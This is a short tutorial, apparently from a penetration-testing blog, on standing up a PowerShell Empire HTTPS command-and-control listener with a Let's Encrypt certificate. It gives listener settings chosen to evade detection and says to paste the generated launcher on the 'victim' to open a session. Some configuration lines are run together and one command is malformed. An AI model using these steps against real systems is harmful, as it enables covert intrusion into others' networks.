Using PowerShell Empire with a Trusted Certificate

Using a trusted certificate and non-default Empire options will help increase your chances of getting a successful session out of a network. Follow these instructions to get setup.

First, get a signed digital certificate for your server using Let’s Encrypt.

Visit https://certbot.eff.org/ for instructions. The process is also shown here for Apache running on Debian. First, select your server software and Operating system, in this case Apache and Debian 8.

Certbot Start Page

Add the Jessie Backports Repo to your sources.list file ( /etc/apt/sources.list in this case) by adding the following line:

deb http://ftp.debian.org/debian jessie-backports main

Then update with this command:

sudo apt-get update

Install the Certbot package:

sudo apt-get install python-certbot-apache -t jessie-backports

Run the apache plugin:

sudo certbot --apache

This will prompt you to answer some questions. Note that you will be required to have a domain name pointing to your server (they are cheap, just buy one) because Let’s Encrypt will not issue certificates for bare IP addresses. Alternatively, you could use a self signed certificate as described here, which would not require a domain name.

Successful Setup via Let’s Encrypt

Now combine your cert.pem and privkey.pem into the same file for use with Empire (Thanks Joff)

cd /etc/letsencrypt/live/<your domain>

cat cert.pem privkey.pem > empire.pem

Stop Apache so that ports 80 and 443 are available for your Empire listener:

sudo Apache2 stop

Within Empire, use options similar to the following. Note that changing the jitter and default profile are in attempt to avoid detection of the session and increase chances that you will get a successful session (Thanks Derek)

listeners
set Name 443
set Port 443
set DefaultJitter 0.7
set DefaultJitter 0.7
set CertPath /etc/letsencrypt/live/<your domain>/empire.pem set Host https://<ip of listener> set DefaultProfile /admin/login.php,/console/dashboard.asp,/news/today.jsp| Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; execute

Note: For hints on scripting the startup of your listener see here.

You now have an HTTPS listener on port 443. You can generate a PowerShell command to run on the victim to establish a session with the following Empire commands:

usestager launcher 443

execute

Using the Empire Launcher

Copy and paste the big long PowerShell command into cmd.exe on your victim to establish the session over HTTPS with a trusted certificate. Woot, Woot!

____

*Shout out to Joff Thyer and Derek Banks for the ideas and help in getting it going.